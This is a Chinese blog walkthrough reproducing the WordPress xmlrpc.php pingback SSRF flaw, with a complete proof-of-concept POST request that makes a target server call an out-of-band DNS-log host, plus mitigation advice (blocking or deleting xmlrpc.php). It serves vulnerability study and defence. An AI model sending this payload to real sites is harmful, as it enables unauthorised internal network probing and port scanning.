WordPress xmlrpc.php SSRF漏洞复现

最新推荐文章于 2024-04-02 14:34:20 发布
最新推荐文章于 2024-04-02 14:34:20 发布
阅读量3.5k 收藏 2
点赞数 1
分类专栏: WEB 漏洞复现和分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_zzZ/article/details/109991484
版权

0x01 WordPress xmlrpc.php 存在SSRF漏洞

通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。

0x02 影响版本

WordPress 版本< 3.5.1

造成的影响
1、可以对业务内网进行探测。
2、攻击运行在内网或本地的应用程序(比如溢出攻击)。
3、利用file协议读取本地文件等

0x03漏洞验证

第一步:直接访问这个文件,初步判断

image-20201123113715261

第二步:发现POC验证数据包

需要修改三处地方:例如:www.baidu.com

Host: www.baidu.com
<param><value><string>DNSLOG地址</string></value></param>
<param><value><string>http://www.baidu.com/?p=1</string></value></param>

完整验证数据包

POST /xmlrpc.php HTTP/1.1
Host: www.目标.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 310

<?xml version="1.0" encoding="iso-8859-1"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>http://g8o53x.dnslog.cn/</string></value></param>
    <param><value><string>http://www.目标.com/?p=1</string></value></param>
    </params>
    </methodCall>

DNSLOG申请地址:

http://www.dnslog.cn/

发送数据包

image-20201123113059935

验证成功

在这里插入图片描述

0x04 修复建议

1、通过APACHE的.htaccess屏蔽xmlrpc.php文件的访问。配置代码如下:

# protect xmlrpc
<Files "xmlrpc.php">
Order Allow,Deny
Deny from all
</Files>

2、删除根目录下的xmlrpc.php。

god_Zeo
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
复现WordPress xmlrpc.php漏洞SSRF
记录并分享学习安全的知识点..
04-02 1914
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 SSRF(服务器端请求伪造) SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为 它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定UR...
WordPressxmlrpc.php完整指南(功能、安全风险、如何禁用)
06-18 1881
XML-RPC是支持WordPress与其他系统之间通信的规范。它通过使用HTTP作为传输机制和XML作为编码机制来标准化这些通信来实现此目的。XML-RPC早于WordPress:它出现在b2博客软件中,该软件于2003年创建了WordPress。该系统的代码存储在站点根目录下的xmlrpc.php文件中。即使XML-RPC在很大程度上已经过时,它仍然存在。在WordPress的早期版本中,默认情况下已关闭XML-RPC。但是从3.5版开始,默认情况下已启用它。
WordPress xmlrpc.php SSRF漏洞
maverickpig的博客
07-08 1286
网络安全自学日志-漏洞复现篇:WordPress xmlrpc.php SSRF漏洞 本文参考https://blog.csdn.net/god_zzZ/article/details/109991484,为本人复现笔记,如有侵权可联系我删除 该漏洞工作中遇到过 一、漏洞详情 1.1 WordPress xmlrpc.php 存在SSRF漏洞 利用WordPress的xmp-rpc接口,通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程
漏洞复现WordPress AutomaticPlugin SSRF漏洞
最新发布
https://blog.echo234.cn/
04-02 414
WordPress AutomaticPlugin 其插件wp_automatic易受未经验证的任意文件下载和SSRF的攻击。位于downloader.php文件中,可能允许攻击者从网站下载任何文件。敏感数据,包括登录凭据和备份文件等。
Apache Ofbiz XMLRPC RCE漏洞(CVE-2020-9496)复现
玄道的网安博客
12-26 892
简介 OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。 影响版本 Apache Ofbiz:< 17.12.04 环境搭建 docker pull andy..
wordpress xmlrpc.php 漏洞,关于WordPress xmlrpc.php Pingback缺陷与SSRF攻击
weixin_29207533的博客
03-10 838
前两天我因为web2hack.org挂了,而分析到原因,当时有些思路,想追踪下去,不过不明确,后来发现WordPress最新版3.5.1出来了,我看到官方说修补了几个安全问题(http://codex.wordpress.org/zh-cn:3.5.1_%E7%89%88%E6%9C%AC),其中有一条引起我的注意:通过Pingback实现的服务器端请求伪造 (Server-side reques...
WordPress XMLRPC安全漏洞
maverickpig的博客
01-23 4702
wordpress xmlrpc安全漏洞
SSRF漏洞复现
m0_57485346的博客
03-15 1232
ssrf漏洞复现
wordpress漏洞_实战Wordpres的CSRF漏洞利用
weixin_39575212的博客
12-12 388
Wordpress简介Wordpress是使用PHP语言开发的博客平台,用户可以在支持PHP和,MySQL数据库的服务器上架设属于自己的网站,也可以把WordPress当做一个内容管理系统(CMS)来使用。WordPress是一款个人博客系统,并逐步演化成一款内容管理软件,他是使用PHP和MySQL数据库开发的。安装WordPress环境1、 下载wordpress压缩包,解压到phpstudy的...
针对WordPressxmlrpc.php暴力破解攻防
秋̶᭄ꦿ攻城狮࿆ྂ
04-02 1817
绪论 通常wordpress登录接口都是做了防暴力破解防护的,利用xmlrpc.php提供的接口尝试猜解用户的密码,可以绕过wordpress对暴力破解的限制。xmlrpc.php或可导致拒绝服务 利用原理 Pingback 是三种类型的反向链接中的一种,当有人链接或者盗用作者文章时来通知作者的一种方法。可以让作者了解和跟踪文章被链接或被转载的情况。一些全球最受欢迎的 blog 系统,都支持 Pi...
xmlrpc.php 漏洞利用
墨痕诉清风的博客
10-10 8010
WordPress采用了接口.并且通过内置函数实现了该接口内容。所以,你可要通过客户端来管理Wordpress。通过使用WordPress XML-RPC, 你可以使用业界流行博客客户端来发布你的WordPress日志和页面。同时,XML-RPC 也可使用插件来自定义你的规则。
xmlrpc.php 漏洞
06-01
XML-RPC 协议中的一个漏洞xmlrpc.php 漏洞,这是一种常见的 Web 应用程序漏洞。 攻击者可以利用这个漏洞,将恶意代码注入到 xmlrpc.php 文件中,然后通过远程调用来执行这些恶意代码,从而获得对系统的控制权。...
WordPress存在DoS拒绝服务漏洞,推荐删除根目录下的xmlrpc.php
weixin_34259159的博客
09-30 266
WordPress存在DoS拒绝服务漏洞,推荐删除根目录下的xmlrpc.php受影响的版本:WordPress 3.9.x-3.9.1WordPress 3.8.x-3.8.3WordPress 3.7.x-3.7.3WordPress 3.6.xWordPress 3.5.x漏洞描述:没有限制xml中的参数数量,导致攻击者可以远程注入恶意xml,对目标服务器直接造成拒绝服务攻击denial o...
WordPress xmlrpc.php 漏洞利用
mingyqf的博客
01-10 1417
原文链接:https://www.jianshu.com/p/42e3b065ad76。
SSRF漏洞
weixin_61143354的博客
08-08 968
网络安全笔记
Apache OFBiz XML-RPC远程代码执行漏洞(CVE-2023-49070)漏洞复现
qq_53733257的博客
12-11 1704
CVE-2023-49070 漏洞复现
WordPress 3.8.1 /xmlrpc.php拒绝服务漏洞
weixin_30376323的博客
03-27 377
漏洞版本: WordPress 3.8.1 漏洞描述: WordPress是一款内容管理系统。 WordPress 3.8.1 /xmlrpc.php 文件有ping其他主机的功能,通过这个功能可以请求多个站点,DDOS攻击别的网站。 <* 参考 http://blog.sucuri.net/2014/03/more-than-162000-wordpress...
Web漏洞-SSRF漏洞(详细)
Ays.Ie的博客
03-10 2968
该篇为Web漏洞-SSRF漏洞(详细)
渗透系列之SSRF漏洞
Websec
02-23 3819
渗透系列之SSRF漏洞 By:梭哈王、小米粥 参考文章: https://xz.aliyun.com/t/2115#toc-2 https://_thorns.gitbooks.io/sec/content/ssrf_tips.html https://_thorns.gitbooks.io/sec/content/ssrf_tips.html 一:漏洞概念 SSRF全称为Serve...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值